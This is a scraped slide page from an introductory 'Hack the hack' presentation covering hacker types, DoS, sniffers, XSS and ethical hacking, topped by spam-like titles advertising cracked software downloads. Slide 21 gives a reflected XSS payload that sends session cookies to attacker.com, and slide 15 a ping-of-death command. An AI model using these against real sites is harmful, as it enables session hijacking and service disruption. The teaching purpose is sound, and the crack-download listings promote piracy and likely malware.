Download Wondershare Filmora Crack [2025] With Latest
tahirabibi60507
 
EASEUS Partition Master Crack + License Code
EASEUS Partition Master Crack + License CodeEASEUS Partition Master Crack + License Code
EASEUS Partition Master Crack + License Code
aneelaramzan63
 
Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025Adobe After Effects Crack FREE FRESH version 2025
Adobe After Effects Crack FREE FRESH version 2025
kashifyounis067
 
PDF Reader Pro Crack Latest Version FREE Download 2025
PDF Reader Pro Crack Latest Version FREE Download 2025PDF Reader Pro Crack Latest Version FREE Download 2025
PDF Reader Pro Crack Latest Version FREE Download 2025
mu394968
 
Maxon CINEMA 4D 2025 Crack FREE Download LINK
Maxon CINEMA 4D 2025 Crack FREE Download LINKMaxon CINEMA 4D 2025 Crack FREE Download LINK
Maxon CINEMA 4D 2025 Crack FREE Download LINK
younisnoman75
 
How to Optimize Your AWS Environment for Improved Cloud Performance
How to Optimize Your AWS Environment for Improved Cloud PerformanceHow to Optimize Your AWS Environment for Improved Cloud Performance
How to Optimize Your AWS Environment for Improved Cloud Performance
ThousandEyes
 

Hack the hack

  • 2. What is Hacking? Hacking Just like burglars break into houses, hackers break into computers. Do you ever wonder how hackers get inside your computer? How can you stop them? Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
  • 3. Types of hackers  Professional hackers  Black Hats – the Bad Guys  White Hats – Professional Security Experts  Script kiddies  Mostly kids/students − User tools created by black hats,  To get free stuff  Impress their peers  Not get caught  Underemployed Adult Hackers  Former Script Kiddies − Can’t get employment in the field − Want recognition in hacker community − Big in eastern european countries  Ideological Hackers  hack as a mechanism to promote some political or ideological purpose  Usually coincide with political events
  • 4. Hacker Terms  Hacking - showing computer expertise  Cracking - breaching security on software or systems  Phreaking - cracking telecom networks  Spoofing - faking the originating IP address in a datagram  Denial of Service (DoS) - flooding a host with sufficient network traffic so that it can’t respond anymore  Port Scanning - searching for vulnerabilities
  • 5. Basic Hacking Skills  Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, you cant do hacking.  Get one of the open-source Unix's and learn to use and run it The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal machine, and run it.  Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers.
  • 6. General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 1. Gathering Information on the target system. 1. Finding a possible loophole in the target system. 1. Exploiting this loophole using exploit code. 1. Removing all traces from the log files and escaping without a trace.
  • 7. IP Addresses  Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network.  An IP Address is a 32-bit address which is divided into four fields of 8-bits each. For Example, 203.94.35.12  All data sent or received by a system will be addressed from or to the system.  An attacker’s first step is to find out the IP Address of the target system.
  • 8. IP Addresses: Finding out an IP Address  A remote IP Address can easily be found out by any of the following methods: Through Instant Messaging Software Through Internet Relay Chat Through Your website Through Email Headers
  • 9. Finding an IP Address via Instant Messengers  Case: If you are chatting on messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend’s system: Your System------Chat Server---- Friend’s System Friend’s System---------Chat Server------- Your System Thus in this case, you first have to establish a direct connection with your friend’s computer by either sending him a file or by using the call feature. Then, goto MSDOS or the command line and type: C:>netstat -n This command will give you the IP Address of your friend’s computer.
  • 10. Finding an IP Address via Email Headers  Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.  A Typical excerpt of such a Header of an email sent from a Hotmail account is: Return-Path: <[email protected]> Received: from hotmail.com by sbcglobal.net (8.9.1/1.1.20.3/13Oct08-0620AM) id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST) Message-ID: <[email protected]> Received: from 202.54.109.174 by www.hotmail.com with HTTP;Sun, Sun, 12 OCT 2008 05:30:14 PST X-Originating-IP: [202.xx.109.174]
  • 11. IP Addresses: Dangers & Concerns Dangers & Concerns  DOS Attacks  Disconnect from the Internet  Trojans Exploitation  Geographical Information  File Sharing Exploits
  • 12. Various Types of Attacks There are an endless number of attacks, which a system administrator has to protect his system from. However, the most common ones are:  Denial of Services attacks (DOS Attacks)  Threat from Sniffing and Key Logging  Trojan Attacks  IP Spoofing  Buffer Overflows  All other types of Attacks
  • 13. THREAT TO INDIA Days after the international hacker group Anonymous brought down Reliance's internet services, the Computer Emergency Response Team India (CERT-In) has warned that websites of reputed government and private organisations are under threat "It is observed that some hacker groups are launching Distributed Denial of Service (DDoS) attacks on websites of government and private organisations in India.In a recent written reply in the Lok Sabha, Minister of State for Communications and IT Sachin Pilot said 112 government websites, including that of Bharat Sanchar Nigam Ltd (BSNL), were hacked in just three months "These attacks are being launched through popular DDoS tools and can consume bandwidth requiring appropriate proactive actions in coordination with service providers,"
  • 14. Denial of Services (DOS) Attacks DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system. In other words, a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users. There are numerous types of Denial of Services Attacks or DOS Attacks.
  • 15. DOS Attacks: Ping of Death Attack The maximum packet size allowed to be transmitted by TCPIP on a network is 65 536 bytes. In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCPIP, is sent to the target system. As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs. This attack can easily be executed by the ‘ping’ command as follows: ping -l 65540 hostname
  • 16. Threats from Sniffers and Key Loggers  Sniffers: capture all data packets being sent across the network in the raw form. Commonly Used for:  Traffic Monitoring  Network Trouble shooting  Gathering Information on Attacker.  For stealing company Secrets and sensitive data.  Commonly Available Sniffers  tcpdump  Ethereal  Dsniff
  • 19. UIC Education Center 19 A Typical Hack Internet Public DNS Server 2 22 2 Web Server (Internal Users) DB Servers DB Server App Servers TRUSTED eC SEGMENT SAN S/W Load Balancing SAN Firewall DMZ Web Servers FTP Drop H/W or S/W Load Balancing 2 4 Firewall Firewall Corporate LAN Employees & Other Internal Users Trusted Business Partners Extranet Firewall Level IV Data
  • 20. Attacking other users: XSS  Reflected XSS  User-input is reflected to web page − Common vulnerability is reflection of input for an error message  Exploitation: User logs in Attacker feeds crafted URL User requests attacker’s URL Server responds with attacker’s Javascript User’s browser sends session token to attacker Attacker hijacks user’s session
  • 21. Attacking other users: XSS  Reflected XSS  Exploit: 1. User logs on as normal and obtains a session cookie 2. Attacker feeds a URL to the user  https://bobadilla.engr.scu.edu/error.php?message=<script>var+i=new+Image; +i.src=“http://attacker.com/”%2bddocument.cookie;</script> 1. The user requests from the application the URL fed to them by the attacker 2. The server responds to the user’s request; the answer contains the javascript 3. User browser receives and executes the javascript  var I = new Image; i.src=http://attacker.com/+document.cookie 1. Code causes the user’s browser to make a request to attacker.com which contains the current session token 2. Attacker monitors requests to attacker.com and captures the token in order to be able to perform arbitrary actions as the user
  • 22. Attacking other users: XSS  Stored XSS Vulnerability Attacker submits question containing malicious Javascript User logs in and views attackers question Server responds with attacker’s JavascriptAttacker’s Javascript executes in user’s browser User’s browser sends session token to attacker Attacker hijacks user’s session
  • 23. Vulnerability What is a vulnerability? Today’s computer software is very complex, comprised of thousands of lines of code. Since software is written by humans, it’s hardly surprising that they contain programming mistakes, known as vulnerabilities. These loopholes are used by hackers to break into systems; they are also used by authors of malicious code to launch their programs automatically on your computer.
  • 24. Ethical Hacking  Independent computer security Professionals breaking into the computer systems.  Neither damage the target systems nor steal information.  Evaluate target systems security and report back to owners about the vulnerabilities found.
  • 25. Ethical Hackers but not Criminal Hackers  Completely trustworthy.  Strong programming and computer networking skills.  Learn about the system and trying to find its weaknesses.  Techniques of Criminal hackers-Detection- Prevention.  Published research papers or released security software.  No Ex-hackers.
  • 26. Being Prepared  What can an intruder see on the target systems?  What can an intruder do with that information?  Does anyone at the target notice the intruder's attempts or successes? 1. What are you trying to protect? 2. Who are you trying to protect against? 3. How much time, effort, and money are you willing to expend to obtain adequate protection?
  • 27. Hands-On Ethical Hacking and Network Defense 27  Ethical hackers  Employed by companies to perform penetration tests  Penetration test  Legal attempt to break into a company’s network to find its weakest link  Tester only reports findings, does not solve problems  Security test  More than an attempt to break in; also includes analyzing company’s security policy and procedures  Tester offers solutions to secure or protect the network
  • 28. Hands-On Ethical Hacking and Network Defense 28  Hackers  Access computer system or network without authorization  Breaks the law; can go to prison  Crackers  Break into systems to steal or destroy data  U.S. Department of Justice calls both hackers  Ethical hacker  Performs most of the same activities but with owner’s permission
  • 29. Computer Crimes  Financial Fraud  Credit Card Theft  Identity Theft  Computer specific crimes  Denial-of-service  Denial of access to information  Viruses Melissa virus cost New Jersey man 20 months in jail − Melissa caused in excess of $80 Million  Intellectual Property Offenses  Information theft  Trafficking in pirated information  Storing pirated information  Compromising information  Destroying information  Content related Offenses  Hate crimes  Harrassment  Cyber-stalking  Child privacy
  • 30. UIC Education Center 30 Question and Answer Q&A ? ?
  • 31. UIC Education Center 31 Suggestions!!..